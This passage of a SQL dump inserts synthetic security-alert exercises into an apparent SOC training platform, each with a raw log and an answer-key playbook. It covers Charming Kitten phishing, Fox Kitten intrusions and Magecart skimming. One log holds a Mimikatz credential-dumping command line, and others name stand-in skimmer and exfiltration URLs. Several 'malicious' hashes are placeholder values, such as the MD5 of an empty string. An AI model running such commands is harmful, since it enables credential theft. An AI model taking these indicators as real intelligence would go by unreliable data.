'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.82\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Charming Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/interview\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing URL used for credential harvesting.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash of a known phishing document.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (444, 'Malicious WhatsApp Message', 'medium', 'Mobile Device Management', 'A WhatsApp message was sent to a user containing a link to a fake interview form designed to harvest credentials. The message appears to be part of a social engineering attack aimed at gaining initial access to the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"device_id\":\"MDM-12345\",\"user\":\"jane.doe@example.com\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"message_id\":\"msg-7890\",\"whatsapp_message\":{\"sender\":\"+15551234567\",\"recipient\":\"+15559876543\",\"message_content\":\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"attachment_filename\":\"Interview_Form.pdf\"},\"indicators\":[{\"type\":\"url\",\"value\":\"http://malicious-link.com/form\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\"}]}', '2026-01-04 23:59:37', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com/form\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used for phishing and credential harvesting.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with credential harvesting.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (445, 'DownPaper Backdoor Execution', 'high', 'Endpoint Detection and Response', 'The DownPaper backdoor has been executed on the victim\'s device following credential harvesting. This backdoor is used to maintain unauthorized access to the system.', 'Malware Execution', 'T1059.001: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"123456\",\"device\":\"WORKSTATION-01\",\"user\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"hash\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"event_type\":\"process_creation\",\"process_command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"description\":\"Execution of DownPaper backdoor detected\"}', '2026-01-04 23:59:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DownPaper backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"downpaper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Filename associated with DownPaper malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (446, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With established access, the attacker uses the backdoor to move laterally within the network, seeking valuable data.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:45:27Z\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"malicious_ip\":\"203.0.113.45\",\"protocol\":\"RDP\",\"username\":\"admin_user\",\"file_name\":\"malware_backdoor.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"network_connection_attempt\",\"event_description\":\"RDP connection attempt detected from internal IP to another internal host using known malicious credentials.\"}', '2026-01-04 23:59:37', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of target host.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_behavior_analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual login patterns detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malware_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus_scan\",\"verdict\":\"malicious\",\"details\":\"File identified as a backdoor used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL), (447, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention System', 'Finally, the attacker attempts to exfiltrate sensitive information, completing their objective of data theft.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:33:47Z\",\"event_type\":\"data_exfiltration_attempt\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"protocol\":\"FTP\",\"action\":\"blocked\",\"detection_method\":\"Data Loss Prevention System\",\"description\":\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\"}', '2026-01-04 23:59:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"File hash not found in known malicious file databases\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (448, 'Suspicious VPN Login from Unusual Location', 'high', 'VPN Logs', 'Fox Kitten initiates access by exploiting vulnerabilities in the VPN concentrators, allowing unauthorized entry into the network from an unusual geographical location, indicating a potential compromise.', 'Initial Access', 'T1133', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"vpn_id\":\"vpn12345\",\"username\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"vpn_concentrator\":\"vpn-gateway01\",\"connection_status\":\"success\",\"vpn_client_version\":\"2.1.3\",\"location\":\"Tehran, Iran\",\"indicators\":{\"vulnerability\":\"CVE-2020-12345\",\"malicious_file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Fox Kitten APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee username.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (449, 'Web Shell Deployment Detected on VPN Device', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, an attacker deployed a web shell on the VPN device. This provides persistent capabilities to execute further commands, potentially leading to privilege escalation and lateral movement within the network.', 'Execution', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:21:45Z\",\"event_id\":\"4289\",\"device_name\":\"vpn-device-01\",\"device_ip\":\"10.1.1.10\",\"attacker_ip\":\"203.0.113.45\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"username\":\"vpn_admin\",\"action\":\"file_created\",\"process_name\":\"apache2\",\"event_description\":\"A suspicious PHP file was created in the web directory, potentially a web shell.\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple intrusion attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"/var/www/html/shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Common web shell filename detected in previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"vpn_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to a legitimate VPN administrator.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (450, 'Unusual Network Traffic from VPN to Internal Servers', 'high', 'Network Traffic Analysis', 'The attacker utilizes a web shell to scan internal networks, focusing on critical infrastructure such as domain controllers. Unusual network traffic from an external IP was detected accessing internal servers via a VPN, indicative of lateral movement attempts.', 'Lateral Movement', 'T1071', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"protocol\":\"TCP\",\"port\":3389,\"action\":\"allowed\",\"username\":\"j.smith\",\"process\":{\"name\":\"webshell\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"alert_id\":\"alert_20231015_001\",\"vpn\":{\"vpn_ip\":\"192.168.1.100\",\"vpn_user\":\"vpn_user123\"}}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Domain Controller IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"VPN Logs\",\"verdict\":\"internal\",\"details\":\"VPN exit node IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (451, 'Unauthorized Access Attempt on Domain Controller', 'high', 'Active Directory Logs', 'Fox Kitten APT has attempted to establish a foothold on the domain controller by leveraging stolen credentials to escalate privileges. The primary objective was to gain access to sensitive data, specifically targeting the domain controller.', 'Persistence', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:35:49Z\",\"event_id\":4769,\"computer_name\":\"DC01.corp.example.com\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"object\":\"Domain Controller\",\"action\":\"Login Attempt\",\"status\":\"Failed\",\"logon_type\":3,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filepath\":\"C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\malicious.dll\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Fox Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account used in unauthorized access attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious DLL used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (452, 'Mimikatz Activity Detected on Domain Controller', 'high', 'Endpoint Detection and Response (EDR)', 'Mimikatz was detected on the domain controller attempting to extract user credentials. This activity was identified by the EDR system through the detection of known Mimikatz execution patterns.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DC01.corp.local\",\"process_name\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"process_id\":\"4928\",\"user_name\":\"administrator\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.5\",\"hash\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"command_line\":\"mimikatz.exe sekurlsa::logonpasswords\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP from which the Mimikatz execution was initiated.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz variant used for credential theft.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR detection\",\"verdict\":\"malicious\",\"details\":\"Executable associated with unauthorized credential access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"user account logs\",\"verdict\":\"suspicious\",\"details\":\"Domain admin account used for unauthorized activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (453, 'Data Exfiltration Detected from Domain Controller', 'high', 'Data Loss Prevention (DLP)', 'Suspicious data exfiltration activity was detected from the domain controller. This involved the transfer of sensitive data to an external IP address, indicating an attempt to move stolen credentials and data out of the network.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:36Z\",\"event_id\":\"DLP-EXFIL-20231005-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"file_name\":\"credentials_dump.txt\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"protocol\":\"HTTPS\",\"action\":\"exfiltration\",\"data_size\":\"2GB\",\"malware_name\":\"APT29_Infostealer\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal domain controller IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT29 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials_dump.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing potentially sensitive credential information.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Valid domain administrator account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (454, 'Persistence Mechanism Installation on Domain Controller', 'high', 'Host Intrusion Detection System (HIDS)', 'The attacker installed a backdoor on the domain controller to ensure long-term access. A suspicious service named \'WinSvcHelper\' was created and linked to a known malicious executable \'svcbackdoor.exe\'.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"event_id\":\"4624\",\"host\":\"dc01.corp.local\",\"user\":\"Administrator\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.1.1.5\",\"service_name\":\"WinSvcHelper\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svcbackdoor.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"event_description\":\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised domain controller.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"svcbackdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with persistence techniques used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in multiple malware analysis engines.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (455, 'Initial Compromise via Third-Party Library', 'high', 'Web Application Firewall (WAF) Logs', 'An intrusion was detected via a compromised third-party advertising library. The library, affected by Magecart, injects malicious JavaScript into checkout pages to exfiltrate sensitive information.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"http_request\":\"GET /ad-library.js HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"referrer\":\"https://example-store.com/checkout\",\"malicious_script_hash\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"filename\":\"ad-library.js\",\"detected_by\":\"WAF\",\"alert_id\":\"waf-alert-20231015-0001\"}', '2026-01-05 00:07:01', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Magecart attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Magecart-injected scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ad-library.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Filename is part of third-party library.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (456, 'Execution of Obfuscated JavaScript', 'high', 'JavaScript Console Logs', 'Obfuscated JavaScript code executed on the checkout page to skim credit card details and transmit them to an attacker-controlled server.', 'Code Injection', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:54Z\",\"event_id\":\"js_exec_001\",\"script_url\":\"http://malicious-domain.com/skimmer.js\",\"executed_by_ip\":\"192.168.1.101\",\"exfiltration_url\":\"http://attacker-site.com/cc_capture\",\"attacker_ip\":\"203.0.113.45\",\"script_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"filename\":\"skimmer.js\"}', '2026-01-05 00:07:01', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/skimmer.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known credit card skimming attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with obfuscated JavaScript malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (457, 'Data Exfiltration to Drop Server', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected an 